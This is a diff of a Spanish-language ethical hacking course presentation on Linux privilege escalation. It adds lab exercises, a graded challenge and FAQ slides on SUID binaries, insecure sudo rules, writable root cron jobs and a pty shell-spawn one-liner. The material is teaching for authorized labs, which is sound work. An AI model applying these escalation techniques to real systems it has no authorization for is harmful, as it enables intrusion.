--- a/classes/parte-3-hacking-etico-y-pentesting-metodologia/076-escalada-de-privilegios-en-linux/clase-076-presentacion.pptx
+++ b/classes/parte-3-hacking-etico-y-pentesting-metodologia/076-escalada-de-privilegios-en-linux/clase-076-presentacion.pptx
@@ -17,6 +17,9 @@
     <p:sldId id="265" r:id="rId16"/>
     <p:sldId id="266" r:id="rId17"/>
     <p:sldId id="267" r:id="rId18"/>
+    <p:sldId id="268" r:id="rId19"/>
+    <p:sldId id="269" r:id="rId20"/>
+    <p:sldId id="270" r:id="rId21"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3198,7 +3201,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>⚠️ Errores comunes</a:t>
+              <a:t>✍️ Ejercicios</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3236,82 +3239,82 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  linpeas.sh: Permission denied — Falta el bit de ejecución; corregir con chmod +x linpeas.sh</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  find: '/proc/...': No such file or directory en la salida de LinPEAS — Ruido normal por procesos efímeros; ignorar y centrarse en secciones resaltadas en rojo/amarillo</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  sudo: no tty present and no askpass program specified — El comando sudo requiere una TTY interactiva; usar python3 -c 'import pty; pty.spawn("/bin/bash")' primero</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  La explotación de GTFOBins no da shell root — Verificar que el binario realmente tiene SUID root (ls -la) y no solo permisos de ejecución normales</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  El cron job editado nunca se ejecuta — Revisar la sintaxis del crontab y confirmar que el servicio cron/crond está activo (systemctl status cron)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Kernel exploit falla o cuelga el sistema — Los exploits de kernel son inestables por diseño; probarlos solo en VMs desechables con snapshot previo</a:t>
+              <a:t>•  Enumera manualmente (sin LinPEAS) los binarios SUID de tu VM de laboratorio y clasifica cuáles son explotables según GTFOBins.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Configura intencionalmente una entrada sudoers insegura (NOPASSWD: /usr/bin/find) y documenta el paso a paso de la escalada.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Crea un cron job de prueba que ejecute un script propiedad de tu usuario no privilegiado desde una tarea root, y explótalo.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Usa pspy64 para observar en tiempo real un cron job que se ejecuta cada minuto sin necesidad de leer /etc/crontab.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Investiga y documenta (sin explotar en producción) un CVE de kernel exploit relevante para una versión específica de Ubuntu o Debian.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Escribe un script de hardening que corrija automáticamente los tres vectores más comunes encontrados en el laboratorio.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3362,7 +3365,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>❓ Preguntas frecuentes</a:t>
+              <a:t>📝 Reto verificable</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3400,97 +3403,22 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  ❓ ¿Es legal practicar escalada de privilegios en mi propia laptop con una VM?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Sí, siempre que la VM y el sistema objetivo sean de tu propiedad o de una plataforma de laboratorio autorizada (HTB, TryHackMe, VulnHub). Nunca lo hagas contra infraestructura de terceros sin contrato de pentesting firmado.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿LinPEAS puede dañar el sistema objetivo?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Es una herramienta de solo enumeración, no explota nada por sí misma, pero puede generar mucho ruido en logs y consumir CPU; en un engagement real se debe acordar su uso con el cliente.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿Qué hago si no encuentro ningún vector obvio con LinPEAS?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Revisa capabilities (getcap -r / 2&gt;/dev/null), NFS con norootsquash, contenedores Docker mal configurados, y variables de entorno heredadas de procesos root.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿Por qué GTFOBins es una herramienta defensiva y no solo ofensiva?</a:t>
+              <a:t>•  Reto: en la VM de laboratorio asignada (con al menos tres vectores de escalada intencionalmente configurados: un SUID explotable, una regla sudo insegura y un cron job escribible), obtén una shell…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Criterio de aceptación: el alumno entrega capturas de id mostrando uid=0(root) para cada uno de los tres métodos, junto con el comando exacto usado y una explicación de la contramedida de hardening…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3541,7 +3469,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🔗 Referencias</a:t>
+              <a:t>⚠️ Errores comunes</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3579,6 +3507,349 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
+              <a:t>•  linpeas.sh: Permission denied — Falta el bit de ejecución; corregir con chmod +x linpeas.sh</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  find: '/proc/...': No such file or directory en la salida de LinPEAS — Ruido normal por procesos efímeros; ignorar y centrarse en secciones resaltadas en rojo/amarillo</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  sudo: no tty present and no askpass program specified — El comando sudo requiere una TTY interactiva; usar python3 -c 'import pty; pty.spawn("/bin/bash")' primero</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  La explotación de GTFOBins no da shell root — Verificar que el binario realmente tiene SUID root (ls -la) y no solo permisos de ejecución normales</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  El cron job editado nunca se ejecuta — Revisar la sintaxis del crontab y confirmar que el servicio cron/crond está activo (systemctl status cron)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Kernel exploit falla o cuelga el sistema — Los exploits de kernel son inestables por diseño; probarlos solo en VMs desechables con snapshot previo</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>❓ Preguntas frecuentes</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Es legal practicar escalada de privilegios en mi propia laptop con una VM?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Sí, siempre que la VM y el sistema objetivo sean de tu propiedad o de una plataforma de laboratorio autorizada (HTB, TryHackMe, VulnHub). Nunca lo hagas contra infraestructura de terceros sin…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿LinPEAS puede dañar el sistema objetivo?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Es una herramienta de solo enumeración, no explota nada por sí misma, pero puede generar mucho ruido en logs y consumir CPU; en un engagement real se debe acordar su uso con el cliente.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Qué hago si no encuentro ningún vector obvio con LinPEAS?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Revisa capabilities (getcap -r / 2&gt;/dev/null), NFS con norootsquash, contenedores Docker mal configurados, y variables de entorno heredadas de procesos root.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Por qué GTFOBins es una herramienta defensiva y no solo ofensiva?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>🔗 Referencias</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
               <a:t>•  GTFOBins — &lt;https://gtfobins.github.io&gt;</a:t>
             </a:r>
           </a:p>
@@ -3644,6 +3915,81 @@
           </a:p>
         </p:txBody>
       </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="274320"/>
+            <a:ext cx="8229600" cy="640080"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Diagrama de la clase</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2" descr="fee22aa368bbf9db.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="2199132"/>
+            <a:ext cx="8229600" cy="3099816"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -3728,7 +4074,7 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  El alumno aprenderá a enumerar sistemáticamente un host Linux tras obtener acceso inicial de bajo privilegio, identificar vectores de escalada (SUID/SGID, sudo mal configurado, cron jobs, PATH escribible, kernel vulnerable) y explotarlos de forma controlada en un laboratorio propio, comprendiendo en paralelo cómo un equipo defensivo detecta y cierra cada uno de estos vectores.</a:t>
+              <a:t>•  El alumno aprenderá a enumerar sistemáticamente un host Linux tras obtener acceso inicial de bajo privilegio, identificar vectores de escalada (SUID/SGID, sudo mal configurado, cron jobs, PATH…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4137,7 +4483,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📖 Definiciones y características</a:t>
+              <a:t>🧠 Explicación en profundidad</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4175,97 +4521,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  SUID (Set User ID): bit de permiso que hace que un binario se ejecute con los privilegios del propietario del archivo, no del usuario que lo invoca. Característica clave: un SUID root ejecutado sin sanitizar rutas o argumentos es una puerta directa a root.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Enfoque defensivo: auditar periódicamente find / -perm -4000 y comparar contra una línea base conocida permite detectar SUID añadidos por un atacante como mecanismo de persistencia.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  SGID (Set Group ID): análogo al SUID pero para el grupo propietario. Característica clave: útil cuando el objetivo es pertenecer a un grupo con acceso a recursos sensibles (por ejemplo, docker o disk).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Enfoque defensivo: revisar membresías de grupos privilegiados (docker, disk, lxd) es tan importante como revisar SUID, porque otorgan escalada equivalente sin necesidad de un binario especial.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  GTFOBins: proyecto colaborativo que documenta binarios Unix legítimos (find, vim, less, awk, etc.) y cómo abusarlos para bypass de restricciones, lectura de archivos o escalada. Característica clave: cada entrada indica el contexto exacto (sudo, SUID, capabilities) en que aplica.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Enfoque defensivo: el equipo azul puede usar GTFOBins como checklist para retirar SUID o reglas sudo innecesarias sobre binarios que aparecen en el catálogo.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Cron job: tarea programada por cron o crontab que se ejecuta con el UID configurado, frecuentemente root para tareas de mantenimiento. Característica clave: si el script apuntado es editable por el atacante, la próxima ejecución corre el payload como root.</a:t>
+              <a:t>•  Un acceso inicial en Linux suele dar una shell de usuario sin privilegios —el www-data de</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  un servidor web, una cuenta de servicio—, y desde ahí el trabajo es llegar a root, que</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  es el impacto que de verdad se reporta. La escalada casi nunca depende de un exploit del</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  kernel exótico: depende de configuraciones incorrectas que se acumulan en cualquier</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  sistema con el tiempo. Un permiso de más, un binario SUID innecesario, una regla de sudo</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  mal escrita, un cron editable. La escalada es, sobre todo, un ejercicio de enumeración</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  paciente: encontrar la pieza mal puesta que abre el camino.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4316,7 +4662,7 @@
